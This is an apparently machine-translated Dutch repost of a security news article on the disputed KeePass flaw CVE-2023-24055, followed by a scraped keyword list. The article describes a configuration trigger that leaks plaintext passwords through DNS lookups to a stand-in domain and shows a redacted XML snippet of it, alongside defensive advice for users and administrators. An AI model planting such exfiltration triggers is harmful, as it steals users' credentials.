Het zijn een paar nieuwswaardige weken geweest voor wachtwoordmanagers - die handige hulpprogramma's die u helpen een ander wachtwoord te bedenken voor elke website die u gebruikt, en ze vervolgens allemaal bij te houden.
Eind 2022 was het de beurt aan LastPass om overal in het nieuws te zijn, toen het bedrijf eindelijk toegaf dat een inbreuk die het in augustus 2022 leed, inderdaad eindigde met het wachtwoord van klanten kluizen worden gestolen vanuit de cloudservice waar een back-up van is gemaakt.
(De wachtwoorden zelf zijn niet gestolen, omdat de kluizen versleuteld waren en LastPass geen kopieën had van iemands "hoofdsleutel" voor de back-upkluisbestanden zelf, maar het was een gladdere scheerbeurt dan de meeste mensen graag hoorden.)
Toen was het de beurt aan LifeLock om overal in het nieuws te zijn, toen het bedrijf waarschuwde voor wat leek op een uitslag van aanvallen om wachtwoorden te raden, waarschijnlijk gebaseerd op wachtwoorden die zijn gestolen van een geheel andere website, mogelijk enige tijd geleden, en misschien onlangs op het dark web zijn gekocht.
LifeLock zelf was niet gehackt, maar sommige van zijn gebruikers wel, dankzij het gedrag van het delen van wachtwoorden veroorzaakt door risico's waarvan ze zich misschien niet eens herinneren dat ze deze hebben genomen.
Concurrenten 1Password en BitWarden zijn onlangs ook in het nieuws geweest, op basis van meldingen van kwaadaardige advertenties, blijkbaar onbewust uitgezonden door Google, die gebruikers op overtuigende wijze naar replica-inlogpagina's lokten om hun accountgegevens te phishen.
Nu is het de beurt aan KeePass in het nieuws, dit keer voor weer een ander cyberbeveiligingsprobleem: een vermeend kwetsbaarheid, de jargonterm die wordt gebruikt voor softwarebugs die leiden tot gaten in de cyberbeveiliging die aanvallers kunnen misbruiken voor kwaadaardige doeleinden.
Wachtwoord snuiven gemakkelijk gemaakt
We verwijzen ernaar als een kwetsbaarheid hier omdat het een officiële bug-identificatie heeft, uitgegeven door het Amerikaanse National Institute for Standards and Technology.
De bug is nagesynchroniseerd CVE-2023-24055: Aanvaller die schrijftoegang heeft tot het XML-configuratiebestand [kan] de leesbare wachtwoorden verkrijgen door een exporttrigger toe te voegen.
De bewering over het verkrijgen van leesbare wachtwoorden is helaas waar.
Als ik schrijftoegang heb tot uw persoonlijke bestanden, inclusief uw zogenaamde %APPDATA%
directory, kan ik stiekem de configuratiesectie aanpassen om KeePass-instellingen te wijzigen die je al hebt aangepast, of om aanpassingen toe te voegen als je niet bewust iets hebt veranderd...
...en ik kan verrassend eenvoudig uw wachtwoorden in platte tekst stelen, hetzij in bulk, bijvoorbeeld door de hele database als een niet-versleuteld CSV-bestand te dumpen, of zoals u ze gebruikt, bijvoorbeeld door een "programmahaak" in te stellen die wordt geactiveerd telkens wanneer u een wachtwoord uit de database.
Merk op dat ik niet nodig heb Beheerder privileges, omdat ik niet hoef te knoeien met de eigenlijke installatiemap waar de KeePass-app wordt opgeslagen, wat normaal gesproken niet toegankelijk is voor gewone gebruikers
En ik heb geen toegang nodig tot vergrendelde globale configuratie-instellingen.
Interessant is dat KeePass er alles aan doet om te voorkomen dat uw wachtwoorden worden opgespoord wanneer u ze gebruikt, inclusief het gebruik van sabotagebeveiligingstechnieken om verschillende anti-keylogger-trucs te stoppen, zelfs van gebruikers die al sysadmin-bevoegdheden hebben.
Maar de KeePass-software maakt het ook verrassend eenvoudig om wachtwoordgegevens in platte tekst vast te leggen, misschien op manieren die u misschien als "te gemakkelijk" zou beschouwen, zelfs voor niet-beheerders.
Het was een minuutje werk om de KeePass GUI te gebruiken om een Trigger -gebeurtenis om elke keer dat u een wachtwoord naar het klembord kopieert, uit te voeren en om die gebeurtenis in te stellen om een DNS-lookup uit te voeren die zowel de gebruikersnaam als het wachtwoord in platte tekst bevat:
We zouden dan de niet al te voor de hand liggende XML-instelling voor die optie uit ons eigen lokale configuratiebestand kunnen kopiëren naar het configuratiebestand van een andere gebruiker op het systeem, waarna ook zij zouden ontdekken dat hun wachtwoord via DNS-lookups over het internet was gelekt.
Hoewel de XML-configuratiegegevens grotendeels leesbaar en informatief zijn, gebruikt KeePass merkwaardig genoeg willekeurige gegevensreeksen die bekend staan als GUID's (afkorting van wereldwijd unieke identifiers) om de verschillende aan te duiden Trigger instellingen, zodat zelfs een goed geïnformeerde gebruiker een uitgebreide referentielijst nodig heeft om te begrijpen welke triggers zijn ingesteld en hoe.
Dit is hoe onze trigger voor DNS-lekken eruit ziet, hoewel we enkele details hebben geredigeerd, zodat je niet meteen kwaad kunt doen door deze tekst rechtstreeks te kopiëren en plakken:
XXXXXXXXXXXXXXXXXXXX Kopiëren Dingen stelen via DNS-lookups XXXXXXXXXXXXXXXXXXXX 0XXXXXXXXXXXXXXXXXXXX opzoeken XXXXX.XXXXX.blah.test WAAR 1
Als deze trigger actief is, zorgt toegang tot een KeePass-wachtwoord ervoor dat de leesbare tekst lekt in een onopvallende DNS-lookup naar een domein van mijn keuze, dat is blah.test
in dit voorbeeld.
Merk op dat echte aanvallers de gestolen tekst vrijwel zeker zouden versleutelen of versluieren, waardoor het niet alleen moeilijker zou worden om te zien wanneer DNS-lekken plaatsvonden, maar ook zouden zorgen voor wachtwoorden die niet-ASCII-tekens bevatten, zoals letters met accenten of emoji's, die anders niet kunnen worden gebruikt in DNS-namen:
Maar is het echt een bug?
De lastige vraag is echter "Is dit echt een bug, of is het gewoon een krachtige functie die kan worden misbruikt door iemand die al minstens evenveel controle over je privébestanden nodig heeft als jijzelf?"
Simpel gezegd, is het een kwetsbaarheid als iemand die al controle heeft over uw account, kan knoeien met bestanden waartoe uw account toch toegang zou moeten hebben?
Ook al zou je misschien hopen dat een pssword-manager veel extra beschermingslagen zou bevatten om het moeilijker te maken om dit soort bugs/features te misbruiken, CVE-2023-24055 echt een kwetsbaarheid op de CVE-lijst zijn?
Als dat zo is, zouden commando's zoals DEL
(verwijder een bestand) en FORMAT
moeten ook "bugs" zijn?
En zou het bestaan van PowerShell, dat potentieel gevaarlijk gedrag veel gemakkelijker maakt om uit te lokken (probeer powerhsell get-clipboard
, bijvoorbeeld), een geheel eigen kwetsbaarheid zijn?
Dat is het standpunt van KeePass, bevestigd door de volgende tekst die is toegevoegd aan de "fout"-detail op de NIST-website:
** BEtwist ** […] OPMERKING: het standpunt van de leverancier is dat de wachtwoorddatabase niet bedoeld is om beveiligd te zijn tegen een aanvaller die dat toegangsniveau tot de lokale pc heeft.
Wat te doen?
Als u een zelfstandige KeePass-gebruiker bent, kunt u controleren op frauduleuze triggers zoals de "DNS Stealer" die we hierboven hebben gemaakt door de KeePass-app te openen en de Tools > triggers… venster:
Let op dat je het geheel kunt omdraaien Trigger systeem uit dit venster, gewoon door het deselecteren van de [ ] Enable trigger system
keuze…
…maar dat is geen algemene instelling, dus het kan weer worden ingeschakeld via uw lokale configuratiebestand en beschermt u daarom alleen tegen fouten, in plaats van tegen een aanvaller met toegang tot uw account.
U kunt de optie voor iedereen op de computer geforceerd uitschakelen, zonder dat ze de mogelijkheid hebben om het zelf weer in te schakelen, door het algemene "lockdown" -bestand aan te passen KeePass.config.enforced.XML
, gevonden in de map waar het app-programma zelf is geïnstalleerd.
Triggers worden voor iedereen geforceerd uitgeschakeld als uw globale XML-afdwingingsbestand er als volgt uitziet:
vals
(Voor het geval je het je afvraagt: een aanvaller die schrijftoegang heeft tot de toepassingsmap om deze wijziging ongedaan te maken, zou vrijwel zeker genoeg kracht op systeemniveau hebben om het KeePass-uitvoerbare bestand zelf te wijzigen of toch een zelfstandige keylogger te installeren en te activeren.)
Als u een netwerkbeheerder bent die belast is met het vergrendelen van KeePass op de computers van uw gebruikers, zodat het nog steeds flexibel genoeg is om hen te helpen, maar niet flexibel genoeg om cybercriminelen per ongeluk te helpen, raden we u aan de KeePass door te lezen Veiligheidsproblemen pagina, de triggers pagina, en de Afgedwongen configuratie pagina.
- Door SEO aangedreven content en PR-distributie. Word vandaag nog versterkt.
- Platoblockchain. Web3 Metaverse Intelligentie. Kennis versterkt. Toegang hier.
- Bron: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/
- 1
- 2022
- 70
- a
- in staat
- Over
- boven
- absoluut
- toegang
- toegang
- Account
- actieve
- toegevoegd
- toegegeven
- advertenties
- Na
- tegen
- Alles
- vermeende
- al
- en
- Nog een
- gebruiken
- Aanvraag
- Augustus
- auteur
- auto
- terug
- met een rug
- background-image
- backup
- gebaseerde
- omdat
- wezen
- grens
- Onder
- overtreding
- Bug
- bugs
- vangen
- verzorging
- geval
- veroorzaakt
- oorzaken
- Centreren
- zeker
- verandering
- tekens
- controle
- keuze
- aanspraak maken op
- dichterbij
- Cloud
- kleur
- hoe
- afstand
- compleet
- computer
- computers
- voorwaarden
- Configuratie
- Overwegen
- onder controle te houden
- kopieën
- kon
- deksel
- en je merk te creëren
- aangemaakt
- CVE
- cybercriminelen
- Cybersecurity
- gevaarlijk
- Donker
- Dark Web
- gegevens
- Database
- gegevens
- DEED
- anders
- direct
- Display
- dns
- domein
- Dont
- beneden
- nagesynchroniseerde
- gemakkelijker
- gemakkelijk
- beide
- versleutelde
- handhaving
- genoeg
- Geheel
- Zelfs
- Event
- Alle
- iedereen
- voorbeeld
- Exploiteren
- exporteren
- uitgebreid
- extra
- Kenmerk
- weinig
- Dien in
- Bestanden
- Tot slot
- VIND DE PLEK DIE PERFECT VOOR JOU IS
- flexibel
- volgend
- Dwingen
- gevonden
- oppompen van
- krijgen
- het krijgen van
- Globaal
- Goes
- Kopen Google Reviews
- handig
- gelukkig
- met
- Hoogte
- hulp
- hier
- Gaten
- hoop
- zweven
- Hoe
- Echter
- HTML
- HTTPS
- identificatie
- Onmiddellijk
- in
- omvatten
- inclusief
- Inclusief
- leerzaam
- installeren
- instantie
- Instituut
- Internet
- kwestie
- Uitgegeven
- IT
- zelf
- jargon
- Houden
- bekend
- grotendeels
- LastPass
- Legkippen
- leiden
- lekken
- Lekken
- Niveau
- Lijst
- lokaal
- keek
- LOOKS
- lookup
- gemaakt
- maken
- MERKEN
- manager
- Managers
- Marge
- max-width
- macht
- fout
- fouten
- wijzigen
- meest
- namen
- nationaal
- Noodzaak
- netwerk
- nieuws
- NIST
- een
- verkrijgen
- officieel
- opening
- Keuze
- anders-
- het te bezitten.
- parameter
- Wachtwoord
- wachtwoorden
- Paul
- PC
- Mensen
- misschien
- persoonlijk
- Phishing
- Platte tekst
- Plato
- Plato gegevensintelligentie
- PlatoData
- positie
- Berichten
- mogelijk
- energie
- krachtige
- bevoegdheden
- PowerShell
- privaat
- voorrechten
- waarschijnlijk
- Programma
- gekocht
- doeleinden
- zetten
- vraag
- willekeurige
- uitslag
- lezing
- onlangs
- adviseren
- regelmatig
- niet vergeten
- antwoord
- gemeld
- Rapporten
- omkeren
- risico's
- lopen
- sectie
- beveiligen
- zin
- service
- reeks
- het instellen van
- settings
- Bermuda's
- moet
- eenvoudigweg
- So
- Software
- solide
- sommige
- Iemand
- Spot
- standalone
- normen
- Still
- gestolen
- stop
- opgeslagen
- dergelijk
- vermeend
- SVG
- system
- Nemen
- technieken
- Technologie
- De
- hun
- zich
- daarom
- Door
- niet de tijd of
- naar
- ook
- top
- spoor
- overgang
- transparant
- leiden
- waar
- BEURT
- Gedraaid
- typisch
- unieke
- URL
- us
- .
- Gebruiker
- gebruikers
- utilities
- divers
- Gewelf
- gewelven
- via
- kwetsbaarheid
- W3
- manieren
- web
- Website
- weken
- Wat
- welke
- WIE
- wil
- afvragen
- Mijn werk
- zou
- schrijven
- XML
- Your
- jezelf
- zephyrnet